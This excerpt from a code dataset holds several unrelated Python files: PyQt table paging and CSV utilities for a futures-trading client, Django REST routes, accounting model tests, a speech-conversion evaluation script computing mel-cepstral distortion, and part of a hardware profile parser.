tableView.rowHeight(0)\n    if rowHeight == 0:\n        return\n    tableViewHeight = tableView.height()\n    rowCountPerPage = tableViewHeight // rowHeight - 1  # rows shown per page\n    canNotViewCount = rowCount - rowCountPerPage  # number of rows out of view\n    if canNotViewCount == 0:\n        return\n\n    maxValue = tableView.verticalScrollBar().maximum()\n    if maxValue == 0:\n        return\n    pageValue = (maxValue * rowCountPerPage) // canNotViewCount\n    tableView.verticalScrollBar().setSliderPosition(pageValue * (pageNO - 1))\n\n\ndef pageUp(tableView: QTableView, isLoop=False):  # page up\n\n    if tableView is None:\n        return\n    tableView.clearSelection()\n    rowCount = tableView.model().rowCount()  # total number of rows in the table\n    rowHeight = tableView.rowHeight(0)  # height of one row\n    if rowHeight == 0:\n        return\n    tableViewHeight = tableView.height()  # height of one page\n    rowCountPerPage = tableViewHeight // rowHeight - 1  # rows shown per page\n    canNotViewCount = rowCount - rowCountPerPage  # number of rows out of view\n    if canNotViewCount == 0:\n        return\n    maxValue = tableView.verticalScrollBar().maximum()\n    if maxValue == 0:\n        return\n    pageValue = (maxValue * rowCountPerPage) // canNotViewCount\n    nCurScroller = tableView.verticalScrollBar().value()\n    if nCurScroller > 0:\n        tableView.verticalScrollBar().setSliderPosition(nCurScroller - pageValue)\n        tableView.selectRow(nCurScroller)\n\n    else:\n        if isLoop:\n            tableView.verticalScrollBar().setSliderPosition(maxValue)\n            tableView.selectRow(rowCount - rowCountPerPage)\n        else:\n            tableView.selectRow(0)\n\n\ndef pageDown(tableView: QTableView, isLoop=False):\n    # page down\n\n    if tableView is None:\n        return\n    tableView.clearSelection()\n    rowCount = tableView.model().rowCount()\n    rowHeight = tableView.rowHeight(0)\n    if rowHeight == 0:\n        return\n    tableViewHeight = tableView.height()\n    rowCountPerPage = tableViewHeight // rowHeight - 1  # rows shown per page\n    canNotViewCount = rowCount - rowCountPerPage  # number of rows out of view\n    if canNotViewCount == 0:\n        return\n    maxValue = tableView.verticalScrollBar().maximum()\n    if maxValue == 0:\n        return\n    pageValue = (maxValue * rowCountPerPage) // canNotViewCount\n    nCurScroller = tableView.verticalScrollBar().value()\n    if nCurScroller < maxValue:\n        tableView.verticalScrollBar().setSliderPosition(nCurScroller + pageValue)\n        # print(\"n\", nCurScroller + pageValue)\n        # print(nCurScroller)\n        # 
print(pageValue)\n        if nCurScroller + pageValue >= rowCount:\n            tableView.selectRow(rowCount - rowCountPerPage)\n        else:\n            tableView.selectRow(nCurScroller + pageValue)\n    else:\n        if isLoop:\n            tableView.verticalScrollBar().setSliderPosition(0)\n            tableView.selectRow(0)\n        else:\n            tableView.selectRow(rowCount-1)\n\n\ndef pageHome(tableView: QTableView):\n    # scroll to the very top\n    if tableView is None:\n        return\n    tableView.clearSelection()\n    maxValue = tableView.verticalScrollBar().maximum()\n    # if maxValue == 0:\n    #     return\n    tableView.verticalScrollBar().setSliderPosition(0)\n    tableView.selectRow(0)\n\n\ndef pageEnd(tableView: QTableView):\n    # scroll to the very bottom\n    if tableView is None:\n        return\n    tableView.clearSelection()\n    maxValue = tableView.verticalScrollBar().maximum()\n    # if maxValue == 0:\n    #     return\n    tableView.verticalScrollBar().setSliderPosition(maxValue)\n    rowCount = tableView.model().rowCount()\n    rowHeight = tableView.rowHeight(0)\n    if rowHeight == 0:\n        return\n    tableViewHeight = tableView.height()\n    tableView.selectRow(rowCount - 1)\n\n\ndef pageLeft(tableView: QTableView):\n    # scroll to the far left\n    if tableView is None:\n        return\n\n    maxValue = tableView.horizontalScrollBar().maximum()\n    if maxValue == 0:\n        return\n\n    tableView.horizontalScrollBar().setSliderPosition(0)\n    tableView.selectColumn(0)\n\ndef pageRight(tableView: QTableView):\n    # scroll to the far right\n    if tableView is None:\n        return\n    maxValue = tableView.horizontalScrollBar().maximum()\n    if maxValue == 0:\n        return\n    tableView.horizontalScrollBar().setSliderPosition(maxValue)\n    tableView.selectColumn(tableView.model().columnCount()-1)\n\ndef transfer_simple_table_data(table_data):\n    result = []\n\n    for item in table_data:\n        standard_item = QStandardItem()\n        if isinstance(item, int) or isinstance(item, float):\n            standard_item.setData(QVariant(item), Qt.EditRole)\n            result.append(standard_item)\n        else:\n            standard_item.setText(str(item))\n            result.append(standard_item)\n    return result\n\ndef import_csv_to_table(self, table_model, file_name):\n    \"\"\"Import CSV data into the table\"\"\"\n    try:\n        with open(file_name, \"r\",encoding=\"utf-8\") as file:\n            data = file.readlines()\n            for i in range(1, len(data)):\n                table_model.appendRow(transfer_table_data(strip_n(data[i].split(\",\"))))\n    except PermissionError as e:\n        QMessageBox.warning(self, \"Access denied\", \"You do not have permission to access this file; it may already be open in another program.\")\ndef export_table_to_csv(self, table_model, file_name):\n    '''Export the table data to a CSV file'''\n    try:\n        with open(file_name, \"w\", encoding='utf8', newline=\"\") as file:\n            writer = csv.writer(file)\n            header_list = [table_model.headerData(columnNumber, Qt.Horizontal) for columnNumber in\n                           range(table_model.columnCount())]\n            writer.writerow(header_list)\n            for rowNumber in range(table_model.rowCount()):\n                fields = [table_model.data(table_model.index(rowNumber, columnNumber), Qt.DisplayRole) for\n                          columnNumber\n                          in range(table_model.columnCount())]\n                writer.writerow(fields)\n    except PermissionError as e:\n        QMessageBox.warning(self, \"Access denied\", \"You do not have permission to access this file; it may already be open in another program.\")\n\n\ndef transfer_table_data(table_data):\n    # convert the data into a form QTableView can display\n    result = []\n    for item in table_data:\n        if isinstance(item, list):\n            if not item:\n                result.append(\"\")\n            elif isinstance(item[0], int) or isinstance(item[0], float):\n                # heuristic: numbers above this epoch (2018-01-21) are treated as timestamps\n                if item[0] > 1516512554:\n                    item = [time_stamp_to_str(x) for x in item]\n                    item = \",\".join(item)\n                    result.append(item)\n                else:\n                    # item = [str(x) for x in item]\n                    item = [str(round(x, 2)) for x in item]\n                    item = \",\".join(item)\n                    result.append(item)\n            else:\n                item = [str(x) for x in item]\n                item = \",\".join(item)\n                result.append(item)\n        elif 
isinstance(item, float) or isinstance(item, int):\n            # heuristic: numbers above this epoch (2018-01-21) are treated as timestamps;\n            # checking isinstance(table_data, int) here was a bug -- the test must apply to item\n            if item > 1516512554:\n\n                item = time_stamp_to_str(item,\"%Y/%m/%d %H:%M:%S\")\n                result.append(item)\n            else:\n                # result.append(item)\n                result.append(round(item, 2))\n        elif item is None:\n            result.append(\"\")\n        else:\n            result.append(item)\n    result2 = []\n    for x in result:\n        item = QStandardItem()\n        item.setTextAlignment(Qt.AlignCenter | Qt.AlignRight)\n        if isinstance(x, int) or isinstance(x, float):\n            item.setData(QVariant(x), Qt.DisplayRole)\n        else:\n            item.setText(str(x))\n        result2.append(item)\n\n    return result2\n\n\ndef net_is_used(address):\n    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n    try:\n        s.bind(address)\n    except OSError as e:\n        return True\n    else:\n        return False\n    finally:\n        s.close()\n\n\ndef remove_all_table(table_model):\n    '''Remove all rows from the table'''\n    # print(\"removing\")\n    for row in range(table_model.rowCount()):\n        table_model.removeRow(0)\n\n\ndef update_all_table(table_model, header, data):\n    # replace all data in table_model\n    remove_all_table(table_model)\n    for row, item in enumerate(data):\n        table_model.insertRow(row, transfer_table_data(item))\n\ndef cut(number):\n    if number == \"0E-10\":\n        number = \"%.2f\" % float(0)\n    else:\n        number = \"%.2f\" % float(number)\n    return number\ndef cut_number(recv_json):\n    try:\n        table_data = recv_json[\"table_data\"]\n        if len(table_data[\"在途对冲\"]) > 0:\n            data_lists = table_data[\"在途对冲\"]\n            for data_list in data_lists:\n                if data_list[7] != \"\" and data_list[7] is not None:\n                    data_list[7] = cut(data_list[7])\n                if data_list[8] != \"\" and data_list[8] is not None:\n                    data_list[8] = cut(data_list[8])\n                if data_list[9] != \"\" and data_list[9] is not None:\n                    data_list[9] = cut(data_list[9])\n                if data_list[10] != \"\" and data_list[10] is not None:\n                    data_list[10] = cut(data_list[10])\n                if len(data_list[12]) > 0:\n                    for i in range(len(data_list[12])):\n                        if data_list[12][i] != \"\" and data_list[12][i] is not None and data_list[12][i] != \"None\":\n                            data_list[12][i] = cut(data_list[12][i])\n                if len(data_list[15]) > 0:\n                    for i in range(len(data_list[15])):\n                        if data_list[15][i] != \"\" and data_list[15][i] is not None and data_list[15][i] != \"None\":\n                            data_list[15][i] = cut(data_list[15][i])\n                if data_list[19] != \"\" and data_list[19] is not None:\n                    data_list[19] = cut(data_list[19])\n                if data_list[20] != \"\" and data_list[20] is not None:\n                    data_list[20] = cut(data_list[20])\n        if len(table_data[\"今日开仓\"]) > 0:\n            data_lists = table_data[\"今日开仓\"]\n            for data_list in data_lists:\n                if data_list[7] != \"\" and data_list[7] is not None:\n                    data_list[7] = cut(data_list[7])\n                if data_list[8] != \"\" and data_list[8] is not None:\n                    data_list[8] = cut(data_list[8])\n                if data_list[9] != \"\" and data_list[9] is not None:\n                    data_list[9] = cut(data_list[9])\n                if data_list[10] != \"\" and data_list[10] is not None:\n                    data_list[10] = cut(data_list[10])\n                if len(data_list[12]) > 0:\n                    for i in range(len(data_list[12])):\n                        if data_list[12][i] != \"\" and data_list[12][i] is not None and data_list[12][i] != \"None\":\n                            data_list[12][i] = cut(data_list[12][i])\n                if len(data_list[15]) > 0:\n                    for i in range(len(data_list[15])):\n                        if data_list[15][i] != \"\" and data_list[15][i] is not None and data_list[15][i] != \"None\":\n                            data_list[15][i] = cut(data_list[15][i])\n                if data_list[19] != \"\" and data_list[19] is not None:\n                    data_list[19] = cut(data_list[19])\n                if data_list[20] != \"\" and data_list[20] is not None:\n                    data_list[20] = cut(data_list[20])\n        if len(table_data[\"今日平仓\"]) > 0:\n            data_lists = 
table_data[\"今日平仓\"]\n for data_list in data_lists:\n if data_list[7] != \"\" and data_list[7] is not None:\n data_list[7] = cut(data_list[7])\n if data_list[8] != \"\" and data_list[8] is not None:\n data_list[8] = cut(data_list[8])\n if data_list[9] != \"\" and data_list[9] is not None:\n data_list[9] = cut(data_list[9])\n if data_list[10] != \"\" and data_list[10] is not None:\n data_list[10] = cut(data_list[10])\n if len(data_list[12]) > 0:\n for i in range(len(data_list[12])):\n if data_list[12][i] != \"\" and data_list[12][i] is not None and data_list[12][i] != \"None\":\n data_list[12][i] = cut(data_list[12][i])\n if len(data_list[15]) > 0:\n for i in range(len(data_list[15])):\n if data_list[15][i] != \"\" and data_list[15][i] is not None and data_list[15][i] != \"None\":\n data_list[15][i] = cut(data_list[15][i])\n if data_list[19] != \"\" and data_list[19] is not None:\n data_list[19] = cut(data_list[19])\n if data_list[20] != \"\" and data_list[20] is not None:\n data_list[20] = cut(data_list[20])\n if len(table_data[\"今日到期\"]) > 0:\n data_lists = table_data[\"今日到期\"]\n for data_list in data_lists:\n if data_list[7] != \"\" and data_list[7] is not None:\n data_list[7] = cut(data_list[7])\n if data_list[8] != \"\" and data_list[8] is not None:\n data_list[8] = cut(data_list[8])\n if data_list[9] != \"\" and data_list[9] is not None:\n data_list[9] = cut(data_list[9])\n if data_list[10] != \"\" and data_list[10] is not None:\n data_list[10] = cut(data_list[10])\n if len(data_list[12]) > 0:\n for i in range(len(data_list[12])):\n if data_list[12][i] != \"\" and data_list[12][i] is not None and data_list[12][i] != \"None\":\n data_list[12][i] = cut(data_list[12][i])\n if len(data_list[15]) > 0:\n for i in range(len(data_list[15])):\n if data_list[15][i] != \"\" and data_list[15][i] is not None and data_list[15][i] != \"None\":\n data_list[15][i] = cut(data_list[15][i])\n if data_list[19] != \"\" and data_list[19] is not None:\n data_list[19] = cut(data_list[19])\n if data_list[20] != \"\" and data_list[20] is not None:\n data_list[20] = cut(data_list[20])\n except Exception as e:\n print(e)\n return recv_json[\"table_data\"]\n\ndef get_time(format=\"%Y-%m-%d %H:%M:%S\"):\n # 获得当前时间\n return time.strftime(format, time.localtime())\n\n\ndef search_system_code(system_code):\n # 在guest.json文件中,找到系统单号是system_code的那条数据\n with open(profile.GUEST_JSON_URL, \"r\") as table_json:\n table = json.load(table_json)\n guest_table_json = table['data']\n for guest_data in guest_table_json:\n if guest_data['system_code'] == system_code:\n return guest_data\n return None\n\n\nconfig = ConfigObj(profile.CONFIG_INI_URL, encoding=profile.ENCODING)\n\n\ndef startCTP(ctp_started):\n try:\n if not ctp_started:\n global process\n process = None\n if config['CTP'][\"CTP_ip\"] == \"127.0.0.1\": # 如果默认本地服务器地址是127………\n process = subprocess.Popen(profile.CTP_SERVER_URL + \" \" + config['CTP']['CTP_port'],creationflags=subprocess.CREATE_NEW_CONSOLE,\n cwd=profile.CTP_FILE_URL) # 打开本地服务器\n elif config['CTP'][\"CTP_ip\"] == \"NA\":\n pass\n else:\n pass\n except Exception as e:\n print(\"CTP服务器启动失败\")\n\n\n# 关闭\ndef closeCTP():\n global process\n if process is None:\n pass\n else:\n end_process = subprocess.Popen(\"taskkill /F /pid \" + str(process.pid) + \" -t\",\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n end_process.communicate()\n\ndef merge_InvestorPosition(data):\n new_data = []\n code_list = []\n for datas in data:\n if new_data == []:\n new_data.append(datas)\n 
code_list.append(datas[\"InstrumentID\"])\n else:\n if datas[\"InstrumentID\"] not in code_list:\n code_list.append(datas[\"InstrumentID\"])\n new_data.append(datas)\n else:\n for new_datas in new_data:\n if new_datas[\"InstrumentID\"] == datas[\"InstrumentID\"]:\n new_datas[\"TdBuy\"] = new_datas[\"TdBuy\"] + datas[\"TdBuy\"]\n new_datas[\"TdSell\"] = new_datas[\"TdSell\"] + datas[\"TdSell\"]\n new_datas[\"YstdBuy\"] = new_datas[\"YstdBuy\"] + datas[\"YstdBuy\"]\n new_datas[\"YstdSell\"] = new_datas[\"YstdSell\"] + datas[\"YstdSell\"]\n return new_data\nclass autoTrade(QThread):\n def __init__(self, parent, callback):\n super(autoTrade, self).__init__(parent)\n self.callback = callback\n self.mutex = QMutex()\n self.mutex.lock()\n self.condition = QWaitCondition()\n self._stop = False\n self._pause = False\n\n def run(self):\n while not self._stop:\n if self._pause:\n self.condition.wait(self.mutex)\n self.callback()\n\n def stop(self):\n self._stop = False\n\n def pause(self):\n self._pause = True\n\n def resume(self):\n self.condition.wakeOne()\n self._pause = False\n\n def stop(self):\n self._stop = False\n\n\ndef int_time(now):\n timeArray = time.localtime(now)\n otherStyleTime = time.strftime(\"%Y/%m/%d %H:%M:%S\", timeArray)\n return otherStyleTime\n\"\"\"修改requirement.txt依赖版本\"\"\"\ndef replace_version():\n f = open('requirement.txt', \"r\")\n libs = f.readlines()\n new_libs = []\n for lib in libs:\n if \"PyQt5==5.13.0\" in lib:\n print(\"5.13.0--->5.12.2\")\n lib = lib.replace(\"PyQt5==5.13.0\", \"PyQt5==5.12.2\")\n elif \"PyQt5==5.12.2\" in lib:\n print(\"5.12.2--->5.13.0\")\n lib = lib.replace(\"PyQt5==5.12.2\", \"PyQt5==5.13.0\")\n new_libs.append(lib)\n f.close()\n f = open('requirement.txt', \"w\")\n for new_lib in new_libs:\n f.write(new_lib)\ndef strip_n(datas):\n new_datas = []\n for data in datas:\n new_datas.append(data.strip())\n return new_datas\n\ndef get_header(model):\n header = []\n for i in range(model.columnCount()):\n header.append(model.horizontalHeaderItem(i).text())\n return header\n\n\ndef column_resize(table,model,header):\n data1 = []\n data2 = []\n # 先清空特殊数据\n for i in range(model.rowCount()):\n model_index = model.index(i, header.index(\"相关交易日\"))\n data1.append(model.data(model_index))\n model.setData(model_index, \"\",Qt.EditRole)\n for i in range(model.rowCount()):\n model_index = model.index(i, header.index(\"相关期货价\"))\n data2.append(model.data(model_index))\n model.setData(model_index, \"\",Qt.EditRole)\n # 重置\n table.resizeColumnsToContents()\n # 再归还特殊数据\n for i in range(model.rowCount()):\n model_index = model.index(i, header.index(\"相关交易日\"))\n data1.append(model.data(model_index))\n model.setData(model_index, data1[i],Qt.EditRole)\n for i in range(model.rowCount()):\n model_index = model.index(i, header.index(\"相关期货价\"))\n data1.append(model.data(model_index))\n model.setData(model_index, data2[i],Qt.EditRole)","sub_path":"app/utils/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":28127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"619481524","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.contrib.auth.models import User\nfrom rest_framework import routers, serializers, viewsets\n\nfrom data.models import DataSet, Data, Candle\n\nimport data.views\n\nclass DataSetSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = DataSet\n fields = (\n 'url',\n 'name',\n 'ticker',\n 'sector',\n 'quandl_ticker',\n 
'qtrade_ticker'\n        )\n\nclass DataSetView(viewsets.ModelViewSet):\n    queryset = DataSet.objects.all()\n    serializer_class = DataSetSerializer\n\n\n\nclass DataSerializer(serializers.HyperlinkedModelSerializer):\n    class Meta:\n        model = Data\n        fields = (\n            'data_set',\n            'value',\n            'date'\n        )\n\nclass DataView(viewsets.ModelViewSet):\n    queryset = Data.objects.all()\n    serializer_class = DataSerializer\n\n\n\nclass CandleSerializer(serializers.HyperlinkedModelSerializer):\n    class Meta:\n        model = Candle\n        fields = (\n            'data_set',\n            'volume',\n            'vwap',\n            'high',\n            'low',\n            'open',\n            'close',\n            'start',\n            'end'\n        )\n\nclass CandleView(viewsets.ModelViewSet):\n    queryset = Candle.objects.all()\n    serializer_class = CandleSerializer\n\n\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'datasets', DataSetView)\nrouter.register(r'data', DataView)\nrouter.register(r'candle', CandleView)\n\nurlpatterns = [\n    url(r'^api', include(router.urls)),\n    url(r'^$', data.views.homepage, name='homepage'),\n    url(r'^admin/', admin.site.urls)\n]\n","sub_path":"backtest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"624917332","text":"from datetime import datetime\n\nfrom django.test import TestCase\nfrom django.core.exceptions import ValidationError\n\nfrom .models import Account, Record, BalanceVariation\n\n\ndef populate_db(object_):\n    # Accounts\n    object_.cash, _ = Account.objects.get_or_create(\n        name='Cash', estate=Account.ASSET)\n    object_.asset, _ = Account.objects.get_or_create(\n        name='Asset', estate=Account.ASSET)\n    object_.debts, _ = Account.objects.get_or_create(\n        name='Debts', estate=Account.LIABILITY)\n    object_.clients, _ = Account.objects.get_or_create(\n        name='Clients', estate=Account.ASSET)\n\n    # Record\n    object_.record, _ = Record.objects.get_or_create(date=datetime.today())\n\n    # Balance variation\n    object_.cash_decrease, _ = BalanceVariation.objects.get_or_create(\n        amount=-100, account=object_.cash, record=object_.record)\n    object_.asset_increase = BalanceVariation.objects.get_or_create(\n        amount=100, account=object_.asset, record=object_.record)\n\n\nclass TestAccount(TestCase):\n    def setUp(self):\n        populate_db(self)\n\n    def test_account_create(self):\n        account = Account(name='Cash', estate=Account.ASSET)\n        account.save()\n        self.assertEqual(account.name, 'Cash')\n\n    def test_account_create_parent(self):\n        clients_account = Account(name='Clients', estate=Account.LIABILITY)\n        clients_account.save()\n        some_client_account = Account(\n            name='Some Client Corp.', estate=Account.LIABILITY,\n            parent=clients_account)\n        some_client_account.save()\n        self.assertEqual(some_client_account.parent.name, 'Clients')\n\n    def test_account_balance(self):\n        cash_increase = BalanceVariation(\n            amount=250, account=self.cash, record=self.record)\n        cash_increase.save()\n        self.assertEqual(self.cash.balance, 150)\n\n\nclass TestRecord(TestCase):\n    def setUp(self):\n        populate_db(self)\n\n    def test_record_create(self):\n        self.assertEqual(\n            sum(var.amount for var in self.record.variations.all()), 0)\n\n    def test_record_clean_valid_values(self):\n        # the balanced record from populate_db is valid, so clean() must not raise;\n        # this test and the next had their names swapped relative to what they check\n        exception_raised = False\n        try:\n            self.record.clean()\n        except ValidationError:\n            exception_raised = True\n\n        self.assertFalse(exception_raised)\n\n    def test_record_clean_invalid_values(self):\n        record = Record(date=datetime.today())\n        record.save()\n\n        # Balance variations\n        cash_decrease = BalanceVariation(\n            amount=100, account=self.cash, 
record=record)\n cash_decrease.save()\n clients_increase = BalanceVariation(\n amount=-100, account=self.clients, record=record)\n clients_increase.save()\n asset_increase = BalanceVariation(\n amount=100, account=self.asset, record=record)\n asset_increase.save()\n\n self.assertRaises(ValidationError, record.clean)\n\n\nclass TestBalanceVariation(TestCase):\n def setUp(self):\n populate_db(self)\n\n def test_type_credit1(self):\n self.assertEqual(self.cash_decrease.type_, BalanceVariation.CREDIT)\n\n def test_type_credit2(self):\n debts_increase = BalanceVariation(\n amount=100, account=self.debts, record=self.record)\n debts_increase.save()\n self.assertEqual(debts_increase.type_, BalanceVariation.CREDIT)\n\n def test_type_debit1(self):\n cash_increase = BalanceVariation(\n amount=100, account=self.cash, record=self.record)\n cash_increase.save()\n self.assertEqual(cash_increase.type_, BalanceVariation.DEBIT)\n\n def test_type_debit2(self):\n debts_decrease = BalanceVariation(\n amount=-100, account=self.debts, record=self.record)\n debts_decrease.save()\n self.assertEqual(debts_decrease.type_, BalanceVariation.DEBIT)\n","sub_path":"accounting/records/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"392346667","text":"from glob import glob\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport numpy\nimport argparse\n\nimport pysptk\nimport pyworld\n\nfrom os.path import join, exists\nimport os\n\n# from become_yukarin.config import create_from_json as create_config\nfrom mcepdtw import MelCepstrumAligner, DTWAligner\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--target_feature_directory', '-i1', type=str)\nparser.add_argument('--converted_mcep_directory', '-i2', type=str)\nparser.add_argument('--out_dir', '-o', type=str)\nparser.add_argument('--order', type=int, default=39)\narguments = parser.parse_args()\n\nprint(arguments.target_feature_directory)\nprint(arguments.converted_mcep_directory)\nif not exists(join(arguments.out_dir, \"evaluation\")):\n os.makedirs(join(arguments.out_dir, \"evaluation\"))\n\npaths1 = list(sorted(glob(arguments.target_feature_directory + '/*')))\npaths2 = list(sorted(glob(arguments.converted_mcep_directory + '/*')))\n\nassert len(paths1) == len(paths2)\nnum_files = len(paths1)\n\ndef cdist(c1, c2, otype=0, frame=False):\n \"\"\"Calculation of cepstral distance\n Parameters\n ----------\n c1 : array\n Minimum-phase cepstrum\n c2 : array\n Minimum-phase cepstrum\n otype : int\n Output data type\n (0) [db]\n (1) squared error\n (2) root squared error\n Default is 0.\n frame : bool\n If True, returns frame-wise distance, otherwise returns mean distance.\n Default is False.\n Returns\n -------\n distance\n \"\"\"\n if not otype in [0, 1, 2]:\n raise ValueError(\"unsupported otype: %d, must be in 0:2\" % otype)\n assert c1.shape[0] == c2.shape[0]\n T = c1.shape[0]\n\n s = ((c1[:, 1:] - c2[:, 1:])**2).sum(-1)\n if otype == 0:\n s = numpy.sqrt(2 * s) * 10 / numpy.log(10)\n elif otype == 2:\n s = numpy.sqrt(s)\n if frame:\n return s\n else:\n return s.mean()\n\n\ndist = 0\ntarget_GV = [0]*(arguments.order+1)\nconverted_GV = [0]*(arguments.order+1)\n\n# cv = [0]*40\n# cv1 = 0\n# cv2 = 0\n\nfor num in range(0, num_files):\n tgt_mcep = numpy.fromfile(paths1[num], dtype=numpy.float32, sep=\"\").reshape(-1, (arguments.order+1))\n converted_mcep = numpy.fromfile(paths2[num], 
dtype=numpy.float32, sep=\"\").reshape(-1, (arguments.order+1))\n \n # GV: Global Variance\n for dim in range(0, (arguments.order+1)):\n target_GV[dim] += numpy.var(tgt_mcep, axis=0)[dim]\n converted_GV[dim] += numpy.var(converted_mcep, axis=0)[dim]\n \n # CV: Coefficient of variation\n # for dim in range(0,40):\n # cv[dim] += numpy.abs(numpy.std(mc3[:,dim])/numpy.mean(mc3[:,dim]))\n \n # cv1 += numpy.std(mc2[:,8])/numpy.mean(mc2[:,8])\n # cv2 += numpy.std(mc2[:,39])/numpy.mean(mc2[:,39])\n \n aligner = MelCepstrumAligner(tgt_mcep, converted_mcep)\n tgt_mcep, converted_mcep = aligner.align(tgt_mcep, converted_mcep)\n # print(tgt_mcep.shape)\n # print(converted_mcep.shape)\n mcd = cdist(tgt_mcep, converted_mcep)\n dist += mcd\n print(mcd)\n # drawMcep(mc1,num)\n\n\nwith open(join(arguments.out_dir, \"evaluation\", \"MCD.txt\"), mode=\"w\") as f:\n f.write(str(dist/num_files) + \"\\n\")\n\ntarget_GV = numpy.array(target_GV, dtype=numpy.float32) / num_files\nconverted_GV = numpy.array(converted_GV, dtype=numpy.float32) / num_files\ntarget_GV.tofile(join(arguments.out_dir, \"evaluation\", \"taget.gv\"))\nconverted_GV.tofile(join(arguments.out_dir, \"evaluation\", \"converted.gv\"))\n\nplt.figure(figsize=(16,6))\nplt.plot(target_GV, \"--\", linewidth=2, label=\"Target: global variances\")\nplt.plot(converted_GV, linewidth=2, label=\"baseline: global variances\")\nplt.legend(prop={\"size\": 18})\nplt.yscale(\"log\")\nplt.xlim(0, arguments.order)\nplt.xlabel(\"Dimention\", fontsize=16)\nplt.ylabel(\"Global Varianvce\", fontsize=16)\nplt.savefig(join(arguments.out_dir, \"evaluation\", \"GV.svg\"))\n\n\n# print(\"CV\")\n# for DIM in range(0,40):\n# print(cv[DIM]/50)\n# print(cv1/50)\n# print(cv2/50)\n","sub_path":"01_pytorch_ver/tool/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"20874452","text":"import json\nimport copy\nfrom collections import OrderedDict\n\nimport ee.common.utility as utility\nfrom ee.common import logger\nfrom profile import Profile\nfrom ee.profile.xobj import XObject\n\n#decode unicode to utf-8\ndef _convert(input_value):\n if isinstance(input_value, dict):\n return {_convert(key): _convert(value) for key, value in input_value.iteritems()}\n elif isinstance(input_value, list):\n return [_convert(element) for element in input_value]\n elif isinstance(input_value, unicode):\n return input_value.encode('utf-8')\n else:\n return input_value\n\ndef _addr2hex(addr):\n if isinstance(addr, dict):\n for key, value in addr.iteritems():\n if key is 'addr':\n addr[key] = hex(addr[key])\n _addr2hex(value)\n\ndef _str_dict(input_dict):\n new_dict = copy.deepcopy(input_dict)\n _addr2hex(new_dict)\n return str(new_dict)\n\nclass ProfileParser(object):\n def __init__(self):\n self._base_board_name = None\n\n def read_profile(self,hardware_function_profile):\n logger.boot(\"start parser, profile path:%s\"%(hardware_function_profile))\n try:\n profile = utility.load_json_file(hardware_function_profile,object_hook=_convert)\n except Exception as e:\n logger.boot(\"error: read json profile fail:%s\"%(repr(e)))\n return None\n\n self._base_board_name = profile['base_board']['id']\n Profile.set_base_board_name(self._base_board_name)\n\n for bus in profile['buses']:\n bus_name = bus['id']\n try:\n self._parse_buses(bus)\n except Exception as e:\n logger.boot('error: parse the %s bus fail: %s'%(bus_name, repr(e)))\n else:\n logger.boot('parse the %s 
bus:%s'%(bus_name, _str_dict(Profile.get_bus_by_name(bus_name))))\n\n if 'netconfig' in profile.keys():\n initconfig=Profile.get_initconfig()\n initconfig['netconfig']=profile['netconfig']\n\n if 'digital_io' in profile.keys():\n for io in profile['digital_io']:\n io_id = io['id']\n try:\n self._parse_digital_io(io)\n except Exception as e:\n logger.boot(\"error: parse the %s digital io fail:%s\"%(io_id, repr(e)))\n else:\n logger.boot(\"parse the %s digital io:%s\"%(io_id,Profile.get_ioes()[io_id]))\n\n if \"chips\" in profile:\n for chip in profile['chips']:\n chipname = chip['id']\n try:\n self._parse_chips(chip)\n except Exception as e:\n logger.boot('error: parser the %s chip fail: %s'%(chipname, repr(e)))\n else:\n try:\n str_chip_profile = _str_dict(Profile.get_chip_by_name(chipname))\n except KeyError:\n str_chip_profile = _str_dict(Profile.get_eeprom_by_name(chipname))\n logger.boot('parser the %s chip:%s'%(chipname, str_chip_profile))\n\n if \"boards\" in profile:\n for board in profile['boards']:\n board_name = board['id']\n if 'eeprom' in board.keys():\n eeproms = board['eeprom']\n if isinstance(eeproms,dict):\n eeproms = [eeproms]\n\n if isinstance(eeproms,list) is False:\n logger.boot(\"error: can not parse the board eeprom,invalid format\")\n else:\n for eeprom in eeproms:\n try:\n eeprom_id = eeprom[\"id\"]\n self._parse_eeprom(board_name, eeprom)\n except Exception as e:\n logger.boot('error: parser the %s board eeprom fail: %s'%(board_name,repr(e)))\n else:\n logger.boot('parser the %s board eeprom:%s'%(board_name, _str_dict(Profile.get_eeprom_by_name(eeprom_id))))\n\n try:\n self._parse_boards(board)\n except Exception as e:\n logger.boot('error: parse the %s board fail: %s'%(board_name, repr(e)))\n else:\n logger.boot('parser board success, %s:%s'%(board_name,_str_dict(Profile.get_board_by_name(board_name))))\n\n logger.boot('parse done')\n return True\n\n def _parse_buses(self, bus):\n bus_name = bus['id']\n bus_type = bus['bus']\n \n buses = Profile.get_buses()\n buses[bus_name] = dict()\n\n for key in bus.keys():\n if key != 'id':\n buses[bus_name][key] = bus[key]\n\n if 'path' in bus.keys():\n buses[bus_name]['path'] = utility.get_dev_path() + '/' + bus['path']\n\n if bus_type == 'uart':\n initconfig = Profile.get_initconfig()\n initconfig['uart'] = initconfig.setdefault('uart', OrderedDict())\n initconfig['uart'][bus_name] = dict(baudrate=bus['baudrate'],databits=bus['databits'],stopbits=bus['stopbits'],parity=bus['parity'])\n if 'timestamp' in bus.keys():\n initconfig['uart'][bus_name]['timestamp'] = bus['timestamp']\n\n def _parse_boards(self, board):\n initconfig = Profile.get_initconfig()\n initconfig['boards'] = initconfig.setdefault('boards', list())\n board_name = board['id']\n partno = board['partno']\n partno_list = partno.replace('-', '_')\n method_name = 'parse_' + partno_list.lower()\n class_name = partno.replace('-', '')\n try:\n XObject.get_classes()[class_name].parse_board_profile(board)\n initconfig['boards'].append(board_name)\n except 